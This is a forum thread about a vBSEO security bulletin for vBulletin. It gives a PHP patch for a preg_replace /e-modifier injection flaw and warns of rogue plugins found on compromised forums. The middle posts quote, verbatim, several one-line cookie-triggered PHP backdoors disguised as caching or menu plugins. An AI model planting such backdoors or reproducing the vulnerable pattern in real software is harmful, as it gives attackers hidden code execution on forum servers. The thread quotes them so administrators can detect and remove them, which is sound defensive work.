Dear Customers and Friends, An exploit has come to our attention that necessitates the release of a Patch for all currently supported versions, includingvBSEO 3.6.0vBSEO 3.5.2vBSEO 3.5.1 (including PL release)vBSEO 3.5.0Versions below 3.5.0 are no longer supported and have met end of life. If you are running 3.5.0 or lower, it is highly suggested that you upgrade to a newer build immediately. All of the above install packages in the downloads area have been updated should you wish to re-install the entire product. Version numbers have not changed, and there will be no "PL" designation with this update.Download Now Otherwise, the simple fix is to edit the fileCode:/vbseo/includes/functions_vbseocp_abstract.php Find:PHP: public static function proc_deutf($ptxt, $tocharset){$ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')', $ptxt);return $ptxt;} Replace with:PHP: public static function proc_deutf($ptxt, $tocharset){$ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', \'$1\')) ? $_s : \'$1\').stripslashes(\'$2\')', $ptxt);return $ptxt;} Please take immediate action to protect your sites. IMPORTANT It has been reported that some sites have had random plugins show up in their plugin list in the vB adminCP. Please take the time to go through your plugin list. If you do see anything that doesn't look familiar, it may be wise to disable that plugin while troubleshooting further. Most reports have been tied to the global_complete hook under the core 'vBulletin' product, but may also be elsewhere. We are unsure of any implications or ramifications that may have resulted, as an infinite of code or text may have been injected. However, what we have seen appears to be a link-stealer for outbound traffic and doesn't necessarily expose any information or passwords of your site. It is always a good idea to update your ftp, server, vb admin, vbseocp, and even any htaccess passwords on your server as a precaution. If you find any more information about the issue, please do bring it to our attention ASAP so it can be addressed. If you have any questions, please feel free to open up a ticket or thread and we will be glad to assist further. Thank you, The vBSEO Team http://www.vbseo.com/f5/vbseo-security-bulletin-all-supported-versions-patch-release-52783/ Also it looks like a rouge plugin has been popping up a lot Remove this if you have it! vbCMS Global Thread CachePHP: /* vBCMS Global Thread Cache */(isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);
It looks like there are several bad plugins floating around... Like the one above but with this code. vBulletin Templates Cookie CachingPHP: /* vBulletin Templates Cookie Caching */$vbr="ujhdfgyj";$vbh="6a234a2a6b89b531b6720b9f86f42d7f";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&[/php also [php]/* vBCMS Global Thread Cache */(isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20) and PHP: /* vBulletin Dynamic Menu Filters */(isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20); all these plugins should be removed IMHO if you see them listed
Here is a great post with some disturbing info about vbseo.. In the first few days of January, I found a plugin and a file I didn't recognize (it was one folder that I'd left write access on because SQLite was behaving odd and it was outside of the forum directory). I thought it was something related to an exploited SSO script for a company I won't name. Obviously that wasn't the case. I love vbSEO in so many ways and have been using it for 4 years. I've been using it since early 2007 (under a different business) and credit it with the growth of two forums I've run, one of which I sold. I've been using vBulletin since 2000 and always wanted it to have a high-quality mod for rewriting URLs to match the rest of the review site I'd coded myself (not the current site I used it on). Over at vBulletin.com... kau runs a business that hosts vBSEO and non-vBSEO vBulletin forums: Jafo said that he notified you of this exploit over a year ago: It's one thing if you are a single mod maker who offers a vB Product/Plugin for free, donation or a low price, but you advertise yourself as a company for high traffic sites. Your response as of now is unacceptable for the type of company you claim to be. Your company advertises itself as... Our mental health forum does 600k uniques and 5 million pageviews a month (Google Analytics) and is of a sensitive nature. Now, I have to tell our users to clear their caches/cookies. Many will be understandably paranoid and concerned. Now, I'm not naive. Of course things like this happen, but the important thing is how you choose to respond. Don't hand this off to vBulletin when plugin names like "vBCMS Global Thread Cache" are popping up all over as a result of the vBSEO exploit. Take responsibility:Create a list of all the plugins/products (including the name and code) and other malicious files (for those that have writable directories) that are reported to you or you find yourself.Figure out exactly what the plugin/product/file exploits are doing yourself, with vBulletin or hire a security expert to figure it out.Tell people in a clear blog/forum post exactly what happened (you had fixed the exploit and then it got back into the code, right?), why it happened, why it won't happen again and what steps they need to take to find out how/if the expoit was used, how to remove the plugins/products, and how best to explain to their users (e.g. both the use of vBulletin's dismissible notices for logged in users and the wording of the Notice).Don't be like so many software, security and financial companies are. Instead, look at how LastPass responded to a *potential* breach. They didn't have to mention it because as far as they could tell, nothing had been compromised, but they chose to do the right thing and provided detailed instructions to their customers on what happened and how to act. Now you can even use Google Authenticator for two step verificationwith LastPass. Obviously, vBSEO's security isn't as critical as LastPass, but it doesn't mean you can't learn from them and do the right thing. .... I see the thread is now closed
a post from Juan, the owner... Check out the post, there is more info as well as a tool to check your sites.
Just an FYI. If you were affected by this you will want to do some serious checking that your server doesn't have any backdoors installed. The plugin code is used to inject a stealth shell. Once the hacker runs it on your server he can do any number of bad things. It is a variant of a proof of concept that was created to show how easy it is to use cookies to inject a payload on a server. The interesting thing is it only takes one line of code.
